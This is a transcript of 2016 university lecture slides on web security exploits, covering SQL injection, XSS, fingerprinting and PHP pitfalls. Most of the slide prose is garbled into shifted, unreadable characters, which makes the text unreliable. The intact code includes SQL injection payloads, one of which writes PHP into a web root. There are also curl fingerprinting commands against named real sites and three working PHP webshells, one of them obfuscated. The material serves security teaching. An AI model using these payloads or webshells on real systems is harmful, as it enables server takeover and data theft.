Web Security - Exploits

7f110257501127300df3f923119ba043?s=47 Inndy
October 14, 2016

Web Security - Exploits

2016/Computer Security at National Taiwan University of Science and Technology (NTUST)

7f110257501127300df3f923119ba043?s=128

Inndy

October 14, 2016
Tweet

Transcript

  1. $PNQVUFS4FDVSJUZBU/5645 *OOEZJOOEZUX!HNBJMDPN 8FC4FDVSJUZ&YQMPJUT

  2. 0VUMJOF ˙ #VHBOE7VMOFSBCJMJUZ ˙ $PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC ˙ 7VMOFSBCJMJUZ)VOUJOH ˙ $PNNPO7VMOFSBCJMJUJFT ˙

    944 ˙ 42-*OKFDUJPO
  3. #VH 7VMOFSBCJMJUZ

  4. #VH :PVSBQQMJDBUJPODSBTIFE

  5. 7VMOFSBCJMJUZ *UTBOFYQMPJUBCMFCVH

  6. 8FC4FDVSJUZ

  7. :,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7

    *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 XSS XXE SQL Injection CSRF 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I
  8. 4ZTUFN4FDVSJUZ

  9. :,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7

    *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 Struts2 OGNL RCE Rails YAML RCE XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection ShellShock FastCGI RCE NPRE RCE CSRF Bit-Flipping Attack 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I
  10. $PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC"QQ ˙ -PHJD&SSPS ˙ 3BDF$POEJUJPO ".JTTJOH'VODUJPO-FWFM"DDFTT$POUSPM ˙ *OKFDUJPO ˙ 42-*OKFDUJPO

    944 99&*OKFDUJPO $NE*OKFDUJPO  ˙ .FNPSZ$PSSVQUJPO ˙ VOTFSJBMJ[F JO1)1 DBTFTUVEZ  ˙ %FOJFEP4FSWJDF ˙ 3FHFY%P4 -PHJD#VHMFBETUP*OOJUZ-PPQ
  11. 7VMOFSBCJMJUZ)VOUJOH ˙ 8IJUFCPY5FTU ˙ $PEF3FWJFX ˙ #MBDLCPY5FTU ˙ (VFTTBOEUSZUPJOKFDUTPNFUIJOHUPZPVSJOQVUFMET ˙

    (SBZCPY5FTU ˙ 8IJUFCPY #MBDLCPYUFTUXIFOZPVIBWFQBSUJBMPGTPVSDFDPEFPS PUIFSWFSTJPOPGTPVSDFDPEF
  12. 8IJUFCPY5FTU ˙ )PX  ˙ 3FBEUIFG LJOHDPEF ˙ 3FBEUIFG LJOHDPEF

    ˙ 3FBEUIFG LJOHDPEF ˙ BOETPPO
  13. 8IJUFCPY5FTU&TTFOUJBM4LJMMT5PPMT ˙ $BOZPVSFBEUIJTMBOHVBHF "SFZPVDPNQMFUFMZLOPXUIJTMBOHVBHF  ˙ *GOPU MFBSOJUBOENBTUFSJU ˙ $PNNBOEMJOFUPPMTPSZPVSGBWPSJUFNPEFSOUFYUFEJUPS

    ˙ 4PNFTVQFSDPPMVUJMTMJLF ˙ HSFQ BXL TFE OE ˙ .PEFSOUFYFEJUPSCVUOPUOPUFQBEXJUIPVU  ˙ 4VCMJNF5FYU 7JTVBM4UVEJP$PEF /PUFQBE 
  14. 8IJUFCPY5FTU-BOHVBHFGFBUVSF ˙ 8IBUTXSPOHXJUIUIFTFDPEF  • /* PHP */
 if(!strcmp($_POST['password'], "the

    secret password"))
 {
 echo "You are in!\n";
 } • # shell script
 cd "/home/$USER/data" && zip backup.zip *
  15. 8IJUFCPY5FTU-BOHVBHFGFBUVSF

  16. 8IJUFCPY5FTU-BOHVBHFGFBUVSF

  17. 8IJUFCPY5FTU-BOHVBHFGFBUVSF

  18. 8IJUFCPY5FTU-BOHVBHFGFBUVSF

  19. 8IJUFCPY5FTU-BOHVBHFGFBUVSF )*5$0/$5'PWFSUIFSF

  20. 8IJUFCPY5FTU ˙ 6TFSFHVMBSFYQSFTTJPOUPMPDBUFTPNFUIJOHMPPLTEBOHFSPVT • egrep '(system|fwrite|danger_func)\(.*\$\w+.*\)' -r . • ack-grepJTBHPPEUPPM

    • ack --php '(new )?mysqli?_connect'
  21. 3FHVMBS&YQSFTTJPO ^ABC -JOFTUBSUTXJUI"#$ DEF$ -JOFFOETXJUI%&' A+ 0OF"UPJOOJUZ" A* ;FSPUPJOOJUZ" A?

    ;FSPPSPOF" (ABC|DEF)? "#$PS%&'PSOPUIJOH \w "MQIBCFU %JHJUT 6OEFSMJOF . "OZDIBSBDUFS [i-k3-5OAQ] 0OFPGJ K L    0 " 2
  22. 3FHVMBS&YQSFTTJPO (system|fwrite|danger_func)\(.*\$\w+.*\) POFPGTZTUFN GXSJUF EBOHFS@GVOD DIBSBDUFS  BOZTUSJOH BOZMFOHUI DIBSBDUFS

    DIBSBDUFS  <";B[@>
  23. 8IJUFCPY5FTU 1)1 ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOETZTUFN FYFD QBTTUISPV CBDLRVPUF ˙

    TRMRVFSZNZTRM@RVFSZ NZTRMJRVFSZ 1%0FYFDVUF  ˙ MFVQMPBENPWF@VQMPBEFE@MF @'*-&4 ˙ MFJODMVTJPOSFRVJSF SFRVJSF@PODF JODMVEF JODMVEF@PODF ˙ MFPQFSBUJPOGPQFO VOMJOL MF DPQZ SFOBNF  ˙ TFTTJPONBOBHFNFOU@$00,*& @4&44*0/ TFTTJPO@TUBSU 
  24. 8IJUFCPY5FTU "41/&5/&5.7$ ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOE1SPDFTT4UBSU $SFBUF1SPDFTT  ˙ TRMRVFSZ$PNNBOE5FYU

     ˙ MFVQMPBE3FRVFTU'JMFT 1PTUFE'JMF ˙ MFPQFSBUJPO'JMF= 'JMF4ZTUFN=  ˙ TFTTJPONBOBHFNFOU4FTTJPO
  25. #MBDLCPY5FTU ˙ 5SZUPJOKFDUJPOTPNFUIJOHUPBOZQPTTJCMFJOQVUFME ˙ )551IFBEFS ˙ 9'PSXBSEFE'PS ˙ 6TFS"HFOU ˙

    1045CPEZ ˙ (&5QBSBNFUFS ˙ DPPLJF
  26. #MBDLCPY5FTU ˙ 8IBUUPJOKFDU  ˙ RTFDVSJUZ CVH ˙ R<>TFDVJSUZ CVH

    ˙ RPS ˙ R MTBM  ˙ RTDSJQUBMFSU  TDSJQU
  27. *NBHJOBUJPOBOE$SFBUJWFJTZPVSQPXFS

  28. 8IBUCPY74#MBDLCPY ˙ #MBDLCPYNFUIPEDBORVJDLMZEFUFDUTPNFWVMOFSBCJMJUZ ˙ 42-*OKFDUJPO $NE*OKFDUJPO 8IBUFWFS*OKFDUJPO 944 FUD ˙

    .PTUPG08"415PQDBOCFEFUFDUFE ˙ #VUOPUHPPEBUMPHJDCVH DSZQUPGBJMT ˙ 8IJUFCPYNFUIPEDBOOEBMMCVHBOEWVMOFSBCJMJUZ ˙ *OOJUZUJNF JOOJUZCVH ˙ *UTWFSZIBSEUPEJHWVMOFSBCJMJUZJODPNQMFYBOEIVHFTZTUFN
  29. (SBZCPY5FTUJOH ˙ 8FSFBEDPEFBOEUSZUPJOKFDUJPOTPNFUIJOH ˙ 4PNFUJNFTXFEPOUIBWFGVMMTPVSDFDPEFPS POMZPMEFSWFSTJPOJTBWBJMBCMFMFBLFE ˙ 08"415PQJTFBTZUPEFUFDU OEJUSTU

  30. $PMMFDU*OGPSNBUJPO

  31. $PMMFDUJPO*OGPSNBUJPO ˙ 8IBUBSFXFJOUFSFTUFE  ˙ 8IBUUFDIOPMPHZTUBDLBSFPVSUBSHFUVTFE  ˙ 6OEPDVNFOUFEVOMJTUFE63-"1* ˙

    'VMMQBUIEJTDMPTVSF ˙ 7FSTJPODPOUSPMTZTUFNNBZDBVTFUPTPVSDFDPEFMFBLBHF ˙ 44-$FSUJDBUF
  32. 'JOHFSQSJOUJOH

  33. 'JOHFSQSJOUJOH ˙ 'JHVSFPVUUFDIOPMPHZTUBDLBSFZPVSUBSHFUVTJOH ˙ -BOHVBHF ˙ 'SBNFXPSL ˙ 7FSTJPO ˙

    04 ˙ )5514FSWFS
  34. 'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I http://eyny.com/ HTTP/1.1 302 Found X-Powered-By: PHP/5.2.17

    Location: http://www67.eyny.com/index.php Content-type: text/html Date: Wed, 12 Oct 2016 16:32:22 GMT Server: Apache/2.0.59 1SFUUZPME1)1WFSTJPO "CPVUZFBSTPME
  35. 'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I -k https://stu255.ntust.edu.tw/ntust_stu/stu.aspx HTTP/1.1 200 OK Date:

    Thu, 13 Oct 2016 03:10:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 93 8JOEPXT4FSWFS /&5'SBNFXPSL 
  36. 'JOHFSQSJOUJOH1)1 ˙ IUUQXXXQTDOUVFEVUX 1)1&'%E """"$' • X-Powered-By: PHP/.*

  37. 'JOHFSQSJOUJOH3BJMT

  38. 1BUI%JTDMPTVSF ˙ IUUQXIBUFWFSDPNSPCPUTUYU ˙ 5FMMTFBSDIFOHJOFUPOPUUPTFBSDITPNFQBUI ˙ 4PNFUJNFTJUSFWFBMTXIFSFJTBENJOQBOFMPSDPOHMF

  39. &SSPS.FTTBHF'VMM1BUI%JTDMPTVSF ˙ 4PNFXFCTJUFTIPXTJUTFSSPSNFTTBHFUPVTFS ˙ *UNBZMFBLTPNFDPEFBOEMFQBUI PSFWFOXPSTF ˙ (PPHMFIBDLJOH1%0@@DPOTUSVDU NZTRM ˙

    $POWFSUBOPSNBM(&5QBSBNFUFSUPBSSBZCZJOKFDU<>
  40. &SSPS.FTTBHF'VMM1BUI%JTDMPTVSF

  41. &SSPS.FTTBHF'VMM1BUI%JTDMPTVSF

  42. 44-$FSUJDBUF)PXEPFTJUXPSLT ˙ "TZNNFUSJD$SZQUPHSBQIZ1VCLFZ 1SJWLFZ ˙ &ODSZQUXJUI1VCLFZ EFDSZQUXJUI1SJWLFZ ˙ &ODSZQUXJUI1SJWLFZ EFDSZQUXJUI1VCLFZ

    ˙ 8FDBMMUIJTTJHOJOH ˙ &WFSZDFSUJDBUFIBTBBTZNNFUSJDDSZQUPLFZ ˙ :PVDBOVTFBDFSUUPTJHOBOPUIFSDFSU ˙ :PVSDPNQVUFSIBTTPNFCVJMUJOSPPUDFSU8FDBMMJU$" ˙ :PVUSVTUPOF$" UIFOZPVUSVTUUIFDFSUTTJHOFECZJU
  43. 44-$FSUJDBUF*OBDFSUJDBUF ˙ 5IFNPTUJNQPSUBOUFMEJTDBMMFEDPNNPOOBNF $/  ˙ YWGPSNBUTVQQPSU4VCKFDU"MUFSOBUJWF/BNFGFBUVSFUIBUBMMPX ZPVQVUEJFSFOUEPNBJOJOPOFDFSU

  44. 44-$FSUJDBUF

  45. 7FSTJPO$POUSPM4ZTUFN ˙ 4PNFUJNFT ZPVPQFO'JMF;JMMBBOEESBHFOUJSFGPMEFSUPTFSWFS ˙ TWO ˙ HJU ˙ 8IBUDPOUBJOTJOBHJUSFQPTJUPSZ

     ˙ "UPPMUPEPXOMPBEHJUGSPN)551TFSWFS ˙ IUUQTHJUIVCDPNEFOOZTDSBCCMF
  46. $PNNPO7VMOFSBCJMJUJFT

  47. 944 ˙ )5.-*OKFDUJPO +BWB4DSJQU*OKFDUJPO ˙ $MPTFDVSSFOUBUUSJCVUFUBHBOEJOKFDUTPNFTDSJQU ˙ JNHTSDIUUQJNHVSDPN\*%^QOH ˙ QDMBTTNTH\.&44"(&^Q

    ˙ 5XP5ZQFT ˙ 3FFDUFE944944QBZMPBEGSPNUIFJOQVUFMET ˙ 4UPSFE944944QBZMPBETUPSFEPOUIFTFSWFS
  48. 944 ˙ )PXUPEFGFOTF  ˙ 3FNPWFBMMIUNMUBHTGSPNVTFSJOQVU ˙ )5.-FOUJUZFODPEF

  49. 9443FBMDBTFMJNJUFEMFOHUI944 ˙ 3FBMDBTFJO"*4 4DPSFCPBSEGSPN,PSFBO#P#QSPKFDUMFDUVSFS ˙ IUUQTWVMTFDVSJUZOUVTUMJNJUFEYTT

  50. 42-*OKFDUJPO ˙ $PODBUJOQVUFMETBOE42-TUBUFNFOUXJUIPVUQSPQFSTBOJUJ[F

  51. 42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' or 2 <3# • result => SELECT * FROM users WHERE
 name = '' or 2 <3 #' AND password = 'asjdf'
  52. 42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' UNION SELECT 1, 2, 3# • result => SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,3
 #' AND password = 'asjdf' 6/*0/4&-&$5
  53. 42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' UNION SELECT 1,2,'<?php //bad' INTO 
 OUTFILE '/var/www/index.php'# • result => SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,'<php //bad' INTO
 OUTFILE '/var/www/index.php'
 #' AND password = 'asjdf' */50065'*-&
  54. 42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' OR ASCII(SUBSTR(name, 1, 1)) > 64 # • result => SELECT * FROM users WHERE
 name = '' OR ASCII(SUBSTR(name, 1, 1)) > 64
 #' AND password = 'asjdf' #MJOE*OKFDUJPO
  55. 42-*OKFDUJPO&YQMPJUT • INSERT INTO users (id, name, password, is_admin)
 VALUES

    (NULL, '{$USR}', '{$PWD}', 0); • payload => inndy', 'pass', 1) # • result => INSERT INTO users
 (id, name, password, is_admin)
 VALUES (NULL, 'inndy', 'pass', 1) #', 'xxx', 0); *OTFSU
  56. 42-*OKFDUJPO&YQMPJUT %FNPTRMNBQBEWBODFEVTBHF

  57. 42-*OKFDUJPO&YQMPJUT ˙ 5IJOLPOFNJMMJPOUJNFTCFGPSFFYQMPJUBXJME42-JWVM ˙ 5IJOLBCPVUJU JG42-TUBUFNFOUMPPLTMJLFCFMPX • DELETE FROM article

    WHERE id = '{$ID}'; • UPDATE SET nickname = '{$NICK}' WHERE id = '{$ID}';
  58. 42-*OKFDUJPO&YQMPJUT 8FMM *UTB61%"5&%&-&5&TUBUFNFOU

  59. 42-*OKFDUJPO5SVF5SBHJD4UPSZ 4PNFEBZGCDPNHSPVQT/56IFBE

  60. 42-*OKFDUJPO5SVF5SBHJD4UPSZ

  61. 42-*OKFDUJPO5SVF5SBHJD4UPSZ

  62. 42-*OKFDUJPO&YQMPJUT ˙ :FUBOPUIFSUSVFTUPSZ ˙ "CPVU.BQMF4UPSZQSJWBUFTFSWFS

  63. 0UIFS7VMOFSBCJMJUZ.JTD

  64. #BE&ODPEJOH

  65. 65'5IFCBEDIBS

  66. #BE&ODPEJOH ˙ 8IFOZPVUSZEFDPEFTPNFCZUFTEBUBUPVOJDPEF JOWBMJE CZUFTTFRVFODFXJMMCFDPOWFSUUPVOJDPEF=VGE ˙ =Y&'=Y#'=Y#%JO65' ˙ *UNBZDBVTFTPNFUSPVCMF

  67. 0QFO$5'ˋ.JTDSBOEEVNC ˙ IUUQTHJTUHJUIVCDPN*OOEZBDCGEEGCFGDDGF • /* TL; DR */
 var x

    = genearte_random_bytes(); // Buffer
 x = String.fromCharCode(x.length) + x; // String + Buffer = String
 var token = Base64.encode(x);
  68. 85'1)1

  69. 85'1)1&RVBMJUZ ˙ NE 2/,$%;0 NE 

  70. 85'1)1VOTFSJBMJ[F ˙ $MBTT@@XBLFVQ ˙ $MBTT@@EFTUSVDU ˙ VOTFSJBMJ[FTVDLTVTFBGUFSGSFFJOVOTFSJBMJ[F ˙ /FWFS &WFSVOTFSJBMJ[FTPNFUIJOHGSPNVOUSVTUFETPVSDF

    ˙ 6TF+40/
  71. 85'1)1FYUSBDU ˙ %FGBVMUCFIBWJPSJTPWFSXSJUFBMMFYJTUFEWBSJBCMFT ˙ FYUSBDU TUNURVFSZ GFUDI$PMVNO JUTWFSZDPNNPO

  72. 85'1)1QBTTXPSE@IBTI ˙ QBTTXPSE@IBTI QBTTX=SE 1"44803%@%&'"6-5  ˙ OVMMCZUFUSVODBUJPOXIJMFIBTIJOHQBTTXPSE

  73. 85'1)1BSHVNFOUUZQF ˙ JG TUSDNQ @(&5<QBTTXPSE> QBTTXPSE FDIP1BTT

  74. 4FSWFS4JEF5FNQMBUF*OKFDUJPO

  75. 445* ˙ *UT UIFBHFPG.7$ ˙ #VHCPVOUZ+JOKB445*JO6CFSSFQPSUFECZ0SBOHF ˙ 5SFOEZJO$5'T ˙ 44$5''MBH.BO

    ˙ 4&$6*/4*%&4##4 ˙ )*5$0/$5'4FDVSF1PTU ˙ 4BOECPYNFDIBOJTNJONBOZUFNQMBUFFOHJOF  ˙ 4JNQMF5SJDL<>@@DMBTT@@@@NSP@@<>@@TVCDMBTTFT@@
  76. 445* ˙ &YQMPJUVOQJDLMFVOTFSJBMJ[F JO1ZUIPO ˙ &YQMPJUMF UIFODPOHGSPN@QZMF

  77. )PXUPXSJUFB1)1XFCTIFMM ˙ 5SJWJBM • <?php system($_GET['cmd']); ?> ˙ "MJUUMFDPOGVTF •

    <?php $_REQUEST[a]($_REQUEST[b]); ?> ˙ )FSFJTNZGBWPSJUF TIBSFXJUIZPV • <?php $a55="\x61ss"."ert";$a55($_REQUEST["a"]); ?>